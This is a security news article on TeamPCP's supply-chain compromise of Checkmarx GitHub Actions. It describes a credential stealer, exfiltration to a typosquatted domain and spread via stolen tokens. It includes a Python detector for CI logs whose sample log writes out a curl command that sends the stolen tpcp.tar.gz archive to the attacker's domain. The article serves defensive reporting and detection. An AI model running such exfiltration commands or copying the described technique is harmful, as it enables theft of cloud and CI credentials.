TeamPCP Compromises Checkmarx GitHub Actions Using Stolen CI Credentials

Security researchers have reported that the cloud-native cybercriminal group TeamPCP has expanded its supply chain operations by targeting Checkmarx GitHub Actions workflows. This latest activity follows their notorious compromise of the Trivy vulnerability scanner and associated GitHub Actions.

The compromised workflows include:

How the Attack Works

According to cloud security firm Sysdig, the attackers used a credential-stealing payload similar to the one deployed in the Trivy supply chain attack. The operation appears linked to CVE-2026-33634, a high-severity vulnerability exploited in March 2026.

The malware, dubbed TeamPCP Cloud Stealer, targets CI/CD secrets, cloud credentials (AWS, Google Cloud, Azure), SSH keys, Git tokens, .env files, database credentials, Slack and Discord webhooks, and cryptocurrency wallets. It also collects configuration data from the CI/CD environment.

Techniques and Fallback Mechanisms

The attackers force-pushed malicious commits containing setup.sh to inject the stealer. Stolen data is exfiltrated to checkmarx[.]zone in an encrypted archive (tpcp.tar.gz). As a fallback, the malware creates a repository named docs-tpcp using the victim’s GitHub token to stage stolen data if the primary exfiltration fails.


Sysdig highlighted that typosquatted vendor domains were deliberately used to hide malicious traffic, reducing the chance of detection during log analysis.
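As an added detection example (not from the Sysdig report or the original article), the following Python scans CI runner log lines for the two indicators this article describes: egress to a lookalike of a trusted vendor domain (checkmarx[.]zone impersonating checkmarx.com) and the exfiltration artifacts named in the report (the tpcp.tar.gz archive and the docs-tpcp fallback repository). The trusted-domain allowlist and the log lines are constructed assumptions; tune the allowlist to the vendors your pipelines actually contact.

```python
import re
from urllib.parse import urlsplit

# Assumed allowlist of vendor domains a CI job is expected to reach.
TRUSTED_VENDOR_DOMAINS = {"checkmarx.com", "github.com", "githubusercontent.com"}

# Artifact names quoted in the Sysdig report on this campaign.
KNOWN_IOC_SUBSTRINGS = ("tpcp.tar.gz", "docs-tpcp")

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def registrable_parts(host):
    """Return (second-level label, TLD) for a hostname, e.g. ('checkmarx', 'zone')."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return None
    return labels[-2], labels[-1]


def is_vendor_typosquat(host):
    """True when a host reuses a trusted vendor's label under a TLD that is not allowlisted.

    This is deliberately broad: any non-allowlisted TLD for a trusted label is
    flagged for review rather than silently accepted.
    """
    parts = registrable_parts(host)
    if parts is None:
        return False
    sld, tld = parts
    if f"{sld}.{tld}" in TRUSTED_VENDOR_DOMAINS:
        return False
    trusted_labels = {d.split(".")[0] for d in TRUSTED_VENDOR_DOMAINS}
    return sld in trusted_labels


def scan_ci_log(lines):
    """Return (line_no, finding_type, value) for each suspicious indicator."""
    findings = []
    for n, line in enumerate(lines, 1):
        for url in URL_RE.findall(line):
            host = urlsplit(url).hostname or ""
            if is_vendor_typosquat(host):
                findings.append((n, "typosquat-domain", host))
        for ioc in KNOWN_IOC_SUBSTRINGS:
            if ioc in line:
                findings.append((n, "known-ioc", ioc))
    return findings


# Constructed sample log lines; the first and last are benign.
SAMPLE_CI_LOG = [
    "10:01:02Z curl -sSL https://github.com/example-org/example-action/archive/v1.tar.gz",
    "10:01:05Z curl -X POST https://api.checkmarx.zone/upload -F file=@/tmp/tpcp.tar.gz",
    "10:01:07Z gh repo create docs-tpcp --private",
    "10:01:09Z curl -sSL https://raw.githubusercontent.com/example-org/repo/main/README.md",
]
```

Running `scan_ci_log(SAMPLE_CI_LOG)` flags only lines 2 and 3, which is the traffic pattern the report says the typosquatted domain was chosen to blend in with.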

Escalation and Cross-Repository Compromise

The stealer can extract GitHub personal access tokens from CI runner memory. If tokens have write access to other repositories using Checkmarx actions, attackers can propagate malicious code to additional workflows, creating a cascading supply chain compromise.

The attack reportedly involved the compromise of the cx-plugins-releases service account and trojanized Open VSX extensions (ast-results 2.53.0 and cx-dev-assist 1.7.0). Once activated, the malware detects cloud credentials and retrieves a next-stage payload from the same domain.
